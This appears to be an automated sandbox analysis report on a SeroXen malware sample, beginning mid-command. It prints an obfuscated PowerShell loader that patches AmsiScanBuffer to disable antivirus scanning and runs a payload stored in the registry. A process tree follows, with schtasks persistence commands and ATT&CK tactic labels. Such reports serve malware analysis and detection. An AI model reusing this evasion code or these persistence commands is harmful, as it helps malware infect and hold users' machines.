c',[Reflection.CallingConventions]::Standard,$aHnpsJvpZRNcrB).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$dFigyeCCctI.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g,'+[Char](78)+'ew'+'S'+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$ntOmwrntZa,$aHnpsJvpZRNcrB).SetImplementationFlags('Runt'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+'d'+'');Write-Output $dFigyeCCctI.CreateType();}$kQjqBowVDfimr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+[Char](101)+''+'m'+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+'s'+''+[Char](111)+'f'+'t'+''+'.'+''+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+'Un'+'s'+''+'a'+'f'+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$bjNSyLDAMFdQIL=$kQjqBowVDfimr.GetMethod('G'+[Char](101)+''+'t'+'P'+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XYgScSXCfHepBbavevX=YiCbFoIyvANj @([String])([IntPtr]);$qcUgtsshTPKoHaHlUMHLaB=YiCbFoIyvANj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XOeiVhGGbMh=$kQjqBowVDfimr.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+'2'+''+'.'+'d'+'l'+''+'l'+'')));$nwIPDzZyXcCUep=$bjNSyLDAMFdQIL.Invoke($Null,@([Object]$XOeiVhGGbMh,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+'a'+'r'+[Char](121)+'A')));$HdqIweXGgLkNIiadM=$bjNSyLDAMFdQIL.Invoke($Null,@([Object]$XOeiVhGGbMh,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+'l'+''+[Char](80)+'ro'+'t'+'ec'+[Char](116)+'')));$GpEjGox=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nwIPDzZyXcCUep,$XYgScSXCfHepBbavevX).Invoke(''+[Char](97)+'ms'+'i'+''+[Char](46)+'dl'+[Char](108)+'');$NafhLCIiPuenaoIrC=$bjNSyLDAMFdQIL.Invoke($Null,@([Object]$GpEjGox,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+[Char](117)+'ff'+[Char](101)+''+[Char](114)+'')));$mKTovEvBKo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HdqIweXGgLkNIiadM,$qcUgtsshTPKoHaHlUMHLaB).Invoke($NafhLCIiPuenaoIrC,[uint32]8,4,[ref]$mKTovEvBKo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NafhLCIiPuenaoIrC,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HdqIweXGgLkNIiadM,$qcUgtsshTPKoHaHlUMHLaB).Invoke($NafhLCIiPuenaoIrC,[uint32]8,0x20,[ref]$mKTovEvBKo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'T'+[Char](87)+''+'A'+'R'+'E'+'').GetValue('$'+[Char](55)+''+'7'+''+[Char](115)+''+'t'+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1392
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1852

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2268

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2980

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:3016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:3040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3124

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3212
- C:\Users\Admin\AppData\Local\Temp\SeroXen Launcher.exe
  "C:\Users\Admin\AppData\Local\Temp\SeroXen Launcher.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4064
- - C:\Users\Admin\AppData\Local\Temp\SeroR0X.exe
    "C:\Users\Admin\AppData\Local\Temp\SeroR0X.exe"
    3⤵
    - Executes dropped EXE
    PID:4224
- - C:\Users\Admin\AppData\Local\Temp\Video.exe
    "C:\Users\Admin\AppData\Local\Temp\Video.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:432
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Video.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:3364
  - - C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
      "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4808
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:4296
  - - C:\Users\Admin\AppData\Local\Temp\install.exe
      "C:\Users\Admin\AppData\Local\Temp\install.exe"
      4⤵
      Executes dropped EXE
      PID:1508
  - - C:\Windows\SysWOW64\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Video.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Video.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:1612

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3872

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4044

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4100

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4232

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:544

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:3324

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1936

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4084

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:8

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:3076

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:4452

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2008

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2064

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Scheduled Task/Job

Privilege Escalation

Scheduled Task/Job

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery